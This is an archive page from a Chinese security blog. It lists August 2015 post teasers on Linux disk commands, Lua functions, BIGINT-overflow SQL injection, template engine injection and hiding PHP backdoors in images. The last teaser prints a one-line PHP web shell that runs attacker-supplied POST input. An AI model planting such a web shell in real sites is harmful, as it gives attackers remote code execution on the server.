最新消息:

2015年08月的内容

Linux下查看文件夹大小的命令
学习探索

Linux下查看文件夹大小的命令

pang0lin 2年前 (2015-08-19) 469浏览 0评论

df可以查看一级文件夹大小、使用比例、档案系统及其挂入点,但对文件却无能为力。 du可以查看文件及文件夹的大小。 两者配合使用,非常有效。比如用df查看哪个一级目录过大,然后用df查看文件夹或文件的大小,如此便可迅速确定症结。 下面分别简要介绍 df...

基于BIGINT溢出错误的SQL注入
学习探索

基于BIGINT溢出错误的SQL注入

pang0lin 2年前 (2015-08-19) 465浏览 0评论

我对于通过MySQL错误提取数据的新技术非常感兴趣,而本文中要介绍的就是这样一种技术。当我考察MySQL的整数处理方式的时候,突然对如何使其发生溢出产生了浓厚的兴趣。下面,我们来看看MySQL是如何存储整数的。 (来源:http://dev.mys...

lua中的常用函数总结
学习探索

lua中的常用函数总结

pang0lin 2年前 (2015-08-18) 527浏览 0评论

lua库函数 这些函数都是Lua编程语言的一部分, 点击这里了解更多. assert(value) – 检查一个值是否为非nil, 若不是则(如果在wow.exe打开调试命令)显示对话框以及输出错误调试信息 collectgarbage(...

模板引擎注射:针对现代web应用的新型命令执行
源码审计

模板引擎注射:针对现代web应用的新型命令执行

pang0lin 2年前 (2015-08-14) 392浏览 0评论

0x00 科普 要讨论模板引擎的攻击,先来了解下什么是模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。(百度百科) 说...

PHP图片后门藏匿攻略
渗透测试

PHP图片后门藏匿攻略

pang0lin 2年前 (2015-08-10) 788浏览 0评论

我们平时藏匿图片后门是什么流程呢?我们来看一下 0x01 初级的藏匿方法:   1、建立一个eval.php文件,上面加入我们的后门: <?php assert($_POST[feiji]);?> 2、找一张图片1.jpg,最...